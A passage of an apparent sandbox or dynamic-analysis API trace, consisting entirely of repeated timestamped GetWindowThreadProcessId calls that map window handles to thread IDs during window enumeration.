	[0550.374] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb5c
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x838
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x818
	[0550.375] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x5b8
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x494
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1ec
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x440
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x7e8
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x730
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x2c8
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x31c
	[0550.376] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x330
	[0550.377] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x128
	[0550.377] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x5c8
	[0550.377] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x6f8
	[0550.377] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x358
	[0550.377] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x73c
	[0550.377] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb0
	[0550.377] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x250
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x240
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x790
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x61c
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x540
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x538
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x568
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x538
	[0550.378] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x568
	[0550.379] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x538
	[0550.379] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x540
	[0550.379] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x540
	[0550.379] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x57c
	[0550.379] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x460
	[0550.379] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x554
	[0550.379] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x528
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x79c
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4e0
	[0550.380] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x460
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x460
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x44c
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x778
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x460
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x558
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.381] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1b3c
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x19bc
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x199c
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1998
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1994
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1990
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1984
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x197c
	[0550.382] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1978
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1824
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1088
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1908
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x18cc
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x18d0
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1840
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10c4
	[0550.383] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x128c
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x16e8
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x16cc
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x274
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10e0
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10cc
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10c0
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10d0
	[0550.384] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1198
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1080
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1074
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x106c
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1474
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1414
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xbd0
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x550
	[0550.385] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa38
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x16d0
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x16d4
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x15bc
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x15a0
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x159c
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1598
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1594
	[0550.386] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1590
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x158c
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1588
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1584
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1580
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x157c
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1488
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1404
	[0550.387] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x11b8
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xbd4
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe0c
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xd30
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe70
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x13b8
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe20
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe2c
	[0550.388] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe00
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe04
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc94
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x13b0
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x13ac
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x13a8
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1374
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x132c
	[0550.389] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1328
	[0550.390] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x12d0
	[0550.390] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x12cc
	[0550.390] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x12c8
	[0550.390] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1290
	[0552.196] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1218
	[0552.196] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1214
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x11ec
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x11e8
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x11cc
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1140
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe6c
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x6e8
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc6c
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf94
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xffc
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf74
	[0552.197] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf08
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf0c
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xed8
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe90
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xea8
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfa8
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfbc
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfb8
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfb4
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfb0
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfac
	[0552.198] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfc0
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfd0
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf88
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf84
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf80
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xde0
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xddc
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xdd8
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xd34
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xd10
	[0552.199] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xd0c
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc9c
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc74
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc1c
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc08
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xabc
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x24c
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xbb0
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xbfc
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb10
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x374
	[0552.200] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x368
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb28
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xae8
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb14
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x95c
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa8c
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x46c
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb3c
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa90
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xad0
	[0552.201] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa9c
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xaa0
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb1c
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x7e0
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa74
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x694
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa28
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x9b0
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x8d8
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x940
	[0552.202] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x93c
